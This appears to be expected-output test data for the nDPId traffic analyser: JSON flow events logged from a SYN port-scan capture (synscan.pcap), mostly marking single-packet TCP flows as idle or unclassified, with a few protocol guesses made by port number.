+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 